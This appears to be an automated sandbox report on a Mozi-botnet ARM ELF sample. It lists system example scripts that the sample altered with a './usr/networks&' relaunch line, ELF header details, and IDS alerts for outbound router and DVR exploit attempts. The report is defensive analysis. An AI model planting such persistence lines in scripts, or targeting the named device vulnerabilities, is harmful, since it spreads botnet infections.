                                                                                                                        Preview: ./usr/networks&.if [ `id -u` -ne 0 ] || [ "$1" = "" ]; then exit 1; fi..if [ -x /usr/bin/fping ]; then..PING="/usr/bin/fping".else..PING="/bin/ping -c 2".fi..iface="$1".which=""..while read addr pingme scheme; do..if [ "$which" ]; then continue; fi...#echo " Trying $addr & $pingme ($scheme)" >&2...ip addr add $addr dev $iface >/dev/null 2>&1..ip link set $iface up >/dev/null 2>&1...if $PING $pingme >/dev/null 2>&1; then...which="$scheme"...fi..ip link set $iface down >/dev/null 2>&1..ip addr del $addr dev $iface >/dev/null 2>&1.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/lm-sensors/examples/daemon/healthd.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):266
                                                                                                                        Entropy (8bit):4.736279036741599
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                                                                        MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                                                                        SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                                                                        SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                                                                        SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2712
                                                                                                                        Entropy (8bit):5.4524991837552035
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                                                                        MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                                                                        SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                                                                        SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                                                                        SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                        /usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):2564
                                                                                                                        Entropy (8bit):5.346461718403454
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                                                                        MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                                                                        SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                                                                        SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                                                                        SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                                        /usr/share/doc/mdadm/examples/mdadd.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):9649
                                                                                                                        Entropy (8bit):5.350733164859712
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:mjHnCbuuH+ycHcTK8K8Ks89tg8C8Wdq7cmwc9bVxoY2uwt6fqI9lAnVKS4ID7KMz:ms7hBBC7pWdSK6SI8KzK77
                                                                                                                        MD5:4E3AA249886275CE240D98F18CCB0B12
                                                                                                                        SHA1:0E0A966CB506E61DE4F27571D3D3EF973AE70A94
                                                                                                                        SHA-256:12D9472701FC5E974C36D6FB456F43063EC370CAB5AE42AF8E880C76031FD5B8
                                                                                                                        SHA-512:5117AEB0CA27616A88CDB5C358078C2DF29784037C9D0CDFFE55F54441EBDC81B19FF6CB1356355EC35DFCABE0FD4AC514B18227ED78D486F66054CAD9E226FE
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit 2. fi.}...sanity_check().{. if [ "$(id -u)" != "0" ]; then . printf "\033[40m\033[1;31mERROR: Root check FAILED (you MUST be root to use this script)! Quitting...\n\033[0m" >&2. exit 1. fi.. check_binary mdadm. check_binary sfdisk. check_binary dd. check_binary awk. check_binary grep. check_binary sed. check_binary cat.. if [ -z "$SOURCE" ] || [ -z "$TARGET" ]; then. echo "ERROR: Bad or missing argument(s)" >&2. show_help;. exit 4. fi.. if ! echo "$SOURCE" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Source device $SOURCE does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if ! echo "$TARGET" |grep -q '^/dev/'; then. printf "\033[40m\033[1;31mERROR: Target device $TARGET does not start with /dev/! Quitting...\n\033[0m" >&2. exit 5. fi.. if echo "$SOURCE" |grep -q 'md[0-9]'; then. printf "\033[40m\033[1;31mERROR: The source device specified is an md-device! Quitting...\n\033[0m" >&2. e
                                                                                                                        /usr/share/doc/netcat-openbsd/examples/dist.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):46
                                                                                                                        Entropy (8bit):3.925523369006428
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/tmux/examples/bash_completion_tmux.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/xdotool/examples/ffsp.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                        Entropy (8bit):5.819679405566689
                                                                                                                        TrID:
                                                                                                                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                                        File name:MGuvcs6Ocz
                                                                                                                        File size:307960
                                                                                                                        MD5:eec5c6c219535fba3a0492ea8118b397
                                                                                                                        SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
                                                                                                                        SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
                                                                                                                        SHA512:3482c8324a18302f0f37b6e23ed85f24fff9f50bb568d8fd7461bf57f077a7c592f7a88bb2e1c398699958946d87bb93ab744d13a0003f9b879c15e6471f7400
                                                                                                                        SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                        File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                                        Static ELF Info

                                                                                                                        ELF header

                                                                                                                        Class:ELF32
                                                                                                                        Data:2's complement, little endian
                                                                                                                        Version:1 (current)
                                                                                                                        Machine:ARM
                                                                                                                        Version Number:0x1
                                                                                                                        Type:EXEC (Executable file)
                                                                                                                        OS/ABI:UNIX - System V
                                                                                                                        ABI Version:0
                                                                                                                        Entry Point Address:0x8194
                                                                                                                        Flags:0x4000002
                                                                                                                        ELF Header Size:52
                                                                                                                        Program Header Offset:52
                                                                                                                        Program Header Size:32
                                                                                                                        Number of Program Headers:5
                                                                                                                        Section Header Offset:307280
                                                                                                                        Section Header Size:40
                                                                                                                        Number of Section Headers:17
                                                                                                                        Header String Table Index:16

                                                                                                                        Sections

                                                                                                                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                        NULL0x00x00x00x00x0000
                                                                                                                        .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                                                                        .textPROGBITS0x80f00xf00x34a980x00x6AX0016
                                                                                                                        .finiPROGBITS0x3cb880x34b880x100x00x6AX004
                                                                                                                        .rodataPROGBITS0x3cb980x34b980xb9d00x00x2A008
                                                                                                                        .ARM.extabPROGBITS0x485680x405680x180x00x2A004
                                                                                                                        .ARM.exidxARM_EXIDX0x485800x405800x1280x00x82AL204
                                                                                                                        .eh_framePROGBITS0x510000x410000x40x00x3WA004
                                                                                                                        .tbssNOBITS0x510040x410040x80x00x403WAT004
                                                                                                                        .init_arrayINIT_ARRAY0x510040x410040x40x00x3WA004
                                                                                                                        .fini_arrayFINI_ARRAY0x510080x410080x40x00x3WA004
                                                                                                                        .data.rel.roPROGBITS0x510100x410100x180x00x3WA004
                                                                                                                        .gotPROGBITS0x510280x410280xb80x40x3WA004
                                                                                                                        .dataPROGBITS0x510e00x410e00x9ec80x00x3WA008
                                                                                                                        .bssNOBITS0x5afa80x4afa80x25b900x00x3WA008
                                                                                                                        .ARM.attributesARM_ATTRIBUTES0x00x4afa80x160x00x0001
                                                                                                                        .shstrtabSTRTAB0x00x4afbe0x900x00x0001

                                                                                                                        Program Segments

                                                                                                                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                        EXIDX0x405800x485800x485800x1280x1280x4R 0x4.ARM.exidx
                                                                                                                        LOAD0x00x80000x80000x406a80x406a80x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                                                                        LOAD0x410000x510000x510000x9fa80x2fb380x6RW 0x8000.eh_frame .init_array .fini_array .data.rel.ro .got .data .bss
                                                                                                                        TLS0x410040x510040x510040x00x80x4R 0x4
                                                                                                                        GNU_STACK0x00x00x00x00x00x7RWE0x4

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        04/25/21-20:58:50.031152ICMP449ICMP Time-To-Live Exceeded in Transit92.42.8.17192.168.2.20
                                                                                                                        04/25/21-20:58:50.251236ICMP449ICMP Time-To-Live Exceeded in Transit175.23.26.150192.168.2.20
                                                                                                                        04/25/21-20:58:51.130329ICMP399ICMP Destination Unreachable Host Unreachable24.30.174.238192.168.2.20
                                                                                                                        04/25/21-20:58:51.586813ICMP449ICMP Time-To-Live Exceeded in Transit203.98.96.82192.168.2.20
                                                                                                                        04/25/21-20:58:53.127106ICMP399ICMP Destination Unreachable Host Unreachable103.126.8.6192.168.2.20
                                                                                                                        04/25/21-20:58:53.127142ICMP399ICMP Destination Unreachable Host Unreachable103.126.8.6192.168.2.20
                                                                                                                        04/25/21-20:58:55.368685ICMP449ICMP Time-To-Live Exceeded in Transit171.102.250.33192.168.2.20
                                                                                                                        04/25/21-20:58:56.126866ICMP399ICMP Destination Unreachable Host Unreachable103.126.8.6192.168.2.20
                                                                                                                        04/25/21-20:58:58.976328ICMP401ICMP Destination Unreachable Network Unreachable188.1.231.30192.168.2.20
                                                                                                                        04/25/21-20:58:58.979052ICMP485ICMP Destination Unreachable Communication Administratively Prohibited93.234.3.129192.168.2.20
                                                                                                                        04/25/21-20:58:59.111066ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited172.255.155.208192.168.2.20
                                                                                                                        04/25/21-20:58:59.968568ICMP485ICMP Destination Unreachable Communication Administratively Prohibited94.220.101.122192.168.2.20
                                                                                                                        04/25/21-20:59:00.082059ICMP449ICMP Time-To-Live Exceeded in Transit103.198.172.46192.168.2.20
                                                                                                                        04/25/21-20:59:00.092173ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited154.81.29.141192.168.2.20
                                                                                                                        04/25/21-20:59:00.129355ICMP399ICMP Destination Unreachable Host Unreachable45.180.96.12192.168.2.20
                                                                                                                        04/25/21-20:59:00.133625ICMP449ICMP Time-To-Live Exceeded in Transit196.38.64.6192.168.2.20
                                                                                                                        04/25/21-20:59:00.196691ICMP399ICMP Destination Unreachable Host Unreachable66.128.94.106192.168.2.20
                                                                                                                        04/25/21-20:59:00.196734ICMP399ICMP Destination Unreachable Host Unreachable66.128.94.106192.168.2.20
                                                                                                                        04/25/21-20:59:02.026239ICMP399ICMP Destination Unreachable Host Unreachable37.153.127.87192.168.2.20
                                                                                                                        04/25/21-20:59:02.203219TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)5665080192.168.2.203.22.215.251
                                                                                                                        04/25/21-20:59:02.203219TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)5665080192.168.2.203.22.215.251
                                                                                                                        04/25/21-20:59:03.196766ICMP399ICMP Destination Unreachable Host Unreachable66.128.94.106192.168.2.20
                                                                                                                        04/25/21-20:59:04.147992ICMP449ICMP Time-To-Live Exceeded in Transit64.6.139.1192.168.2.20
                                                                                                                        04/25/21-20:59:04.199731ICMP449ICMP Time-To-Live Exceeded in Transit172.29.52.17192.168.2.20
                                                                                                                        04/25/21-20:59:05.983561ICMP402ICMP Destination Unreachable Port Unreachable112.21.103.31192.168.2.20
                                                                                                                        04/25/21-20:59:07.248271ICMP399ICMP Destination Unreachable Host Unreachable27.50.73.106192.168.2.20
                                                                                                                        04/25/21-20:59:07.248391ICMP399ICMP Destination Unreachable Host Unreachable27.50.73.106192.168.2.20
                                                                                                                        04/25/21-20:59:07.248444ICMP399ICMP Destination Unreachable Host Unreachable27.50.73.106192.168.2.20
                                                                                                                        04/25/21-20:59:08.896217ICMP399ICMP Destination Unreachable Host Unreachable156.154.253.85192.168.2.20
                                                                                                                        04/25/21-20:59:10.285259UDP2030919ET TROJAN Mozi Botnet DHT Config Sent80007723178.175.72.92192.168.2.20
                                                                                                                        04/25/21-20:59:10.988002UDP2030919ET TROJAN Mozi Botnet DHT Config Sent52147723103.91.245.19192.168.2.20
                                                                                                                        04/25/21-20:59:11.012873ICMP485ICMP Destination Unreachable Communication Administratively Prohibited89.56.30.160192.168.2.20
                                                                                                                        04/25/21-20:59:11.107613ICMP449ICMP Time-To-Live Exceeded in Transit24.244.192.10192.168.2.20
                                                                                                                        04/25/21-20:59:11.119350UDP2030919ET TROJAN Mozi Botnet DHT Config Sent243197723125.227.149.119192.168.2.20
                                                                                                                        04/25/21-20:59:11.121278ICMP449ICMP Time-To-Live Exceeded in Transit152.65.255.253192.168.2.20
                                                                                                                        04/25/21-20:59:11.094935TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)4671280192.168.2.20104.85.180.168
                                                                                                                        04/25/21-20:59:11.094935TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)4671280192.168.2.20104.85.180.168
                                                                                                                        04/25/21-20:59:11.153685TCP1200ATTACK-RESPONSES Invalid URL8046712104.85.180.168192.168.2.20
                                                                                                                        04/25/21-20:59:11.497649UDP2030919ET TROJAN Mozi Botnet DHT Config Sent68817723121.132.251.243192.168.2.20
                                                                                                                        04/25/21-20:59:12.514962ICMP399ICMP Destination Unreachable Host Unreachable202.69.55.202192.168.2.20
                                                                                                                        04/25/21-20:59:12.530835ICMP399ICMP Destination Unreachable Host Unreachable176.113.24.179192.168.2.20
                                                                                                                        04/25/21-20:59:13.197892UDP2030919ET TROJAN Mozi Botnet DHT Config Sent243197723125.227.149.119192.168.2.20
                                                                                                                        04/25/21-20:59:13.220211UDP2030919ET TROJAN Mozi Botnet DHT Config Sent4000772359.99.46.89192.168.2.20
                                                                                                                        04/25/21-20:59:14.109575ICMP399ICMP Destination Unreachable Host Unreachable73.248.17.124192.168.2.20
                                                                                                                        04/25/21-20:59:14.114370ICMP399ICMP Destination Unreachable Host Unreachable73.248.17.124192.168.2.20
                                                                                                                        04/25/21-20:59:14.114399ICMP399ICMP Destination Unreachable Host Unreachable73.248.17.124192.168.2.20
                                                                                                                        04/25/21-20:59:14.243091ICMP399ICMP Destination Unreachable Host Unreachable211.170.14.230192.168.2.20
                                                                                                                        04/25/21-20:59:14.243128ICMP399ICMP Destination Unreachable Host Unreachable211.170.14.230192.168.2.20
                                                                                                                        04/25/21-20:59:14.243153ICMP399ICMP Destination Unreachable Host Unreachable211.170.14.230192.168.2.20
                                                                                                                        04/25/21-20:59:15.266251UDP2030919ET TROJAN Mozi Botnet DHT Config Sent10277723117.192.224.209192.168.2.20
                                                                                                                        04/25/21-20:59:17.921512ICMP449ICMP Time-To-Live Exceeded in Transit218.248.161.253192.168.2.20
                                                                                                                        04/25/21-20:59:18.109303ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited104.218.87.244192.168.2.20
                                                                                                                        04/25/21-20:59:18.160816ICMP402ICMP Destination Unreachable Port Unreachable106.201.55.245192.168.2.20
                                                                                                                        04/25/21-20:59:18.130829TCP2029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound5288880192.168.2.20109.67.247.125
                                                                                                                        04/25/21-20:59:18.130829TCP2024916ET EXPLOIT Netgear DGN Remote Command Execution5288880192.168.2.20109.67.247.125
                                                                                                                        04/25/21-20:59:18.295384ICMP449ICMP Time-To-Live Exceeded in Transit103.110.96.117192.168.2.20
                                                                                                                        04/25/21-20:59:21.137105ICMP399ICMP Destination Unreachable Host Unreachable212.143.201.222192.168.2.20
                                                                                                                        04/25/21-20:59:21.137147ICMP399ICMP Destination Unreachable Host Unreachable212.143.201.222192.168.2.20
                                                                                                                        04/25/21-20:59:21.137164ICMP399ICMP Destination Unreachable Host Unreachable212.143.201.222192.168.2.20
                                                                                                                        04/25/21-20:59:21.284165ICMP399ICMP Destination Unreachable Host Unreachable114.4.169.215192.168.2.20
                                                                                                                        04/25/21-20:59:21.284206ICMP399ICMP Destination Unreachable Host Unreachable114.4.169.215192.168.2.20
                                                                                                                        04/25/21-20:59:21.284231ICMP399ICMP Destination Unreachable Host Unreachable114.4.169.215192.168.2.20
                                                                                                                        04/25/21-20:59:25.179285TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5149680192.168.2.2013.226.101.83
                                                                                                                        04/25/21-20:59:25.205521TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4180480192.168.2.2099.192.234.217
                                                                                                                        04/25/21-20:59:25.179285TCP2025883ET EXPLOIT MVPower DVR Shell UCE5149680192.168.2.2013.226.101.83
                                                                                                                        04/25/21-20:59:25.327592TCP1201ATTACK-RESPONSES 403 Forbidden805149613.226.101.83192.168.2.20
                                                                                                                        04/25/21-20:59:25.205521TCP2025883ET EXPLOIT MVPower DVR Shell UCE4180480192.168.2.2099.192.234.217
                                                                                                                        04/25/21-20:59:32.014855ICMP485ICMP Destination Unreachable Communication Administratively Prohibited79.199.60.36192.168.2.20
                                                                                                                        04/25/21-20:59:33.016174ICMP399ICMP Destination Unreachable Host Unreachable212.65.36.172192.168.2.20
                                                                                                                        04/25/21-20:59:35.202466ICMP399ICMP Destination Unreachable Host Unreachable191.37.167.202192.168.2.20
                                                                                                                        04/25/21-20:59:35.202487ICMP399ICMP Destination Unreachable Host Unreachable191.37.167.202192.168.2.20
                                                                                                                        04/25/21-20:59:36.189050ICMP399ICMP Destination Unreachable Host Unreachable41.170.87.1192.168.2.20
                                                                                                                        04/25/21-20:59:36.189101ICMP399ICMP Destination Unreachable Host Unreachable41.170.87.1192.168.2.20
                                                                                                                        04/25/21-20:59:36.189126ICMP399ICMP Destination Unreachable Host Unreachable41.170.87.1192.168.2.20
                                                                                                                        04/25/21-20:59:38.202539ICMP399ICMP Destination Unreachable Host Unreachable191.37.167.202192.168.2.20
                                                                                                                        04/25/21-20:59:39.008981ICMP401ICMP Destination Unreachable Network Unreachable31.22.82.187192.168.2.20
                                                                                                                        04/25/21-20:59:39.081417ICMP485ICMP Destination Unreachable Communication Administratively Prohibited38.122.22.118192.168.2.20
                                                                                                                        04/25/21-20:59:39.094996ICMP449ICMP Time-To-Live Exceeded in Transit2.188.233.0192.168.2.20
                                                                                                                        04/25/21-20:59:39.190476ICMP401ICMP Destination Unreachable Network Unreachable45.169.165.229192.168.2.20
                                                                                                                        04/25/21-20:59:39.324093TCP2025576ET EXPLOIT HackingTrio UA (Hello, World)4534480192.168.2.2061.213.102.33
                                                                                                                        04/25/21-20:59:39.324093TCP2027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)4534480192.168.2.2061.213.102.33
                                                                                                                        04/25/21-20:59:40.028265TCP1201ATTACK-RESPONSES 403 Forbidden8049960154.201.250.66192.168.2.20
                                                                                                                        04/25/21-20:59:39.722924TCP2020899ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution4996080192.168.2.20154.201.250.66
                                                                                                                        04/25/21-20:59:40.967362ICMP402ICMP Destination Unreachable Port Unreachable208.78.42.30192.168.2.20
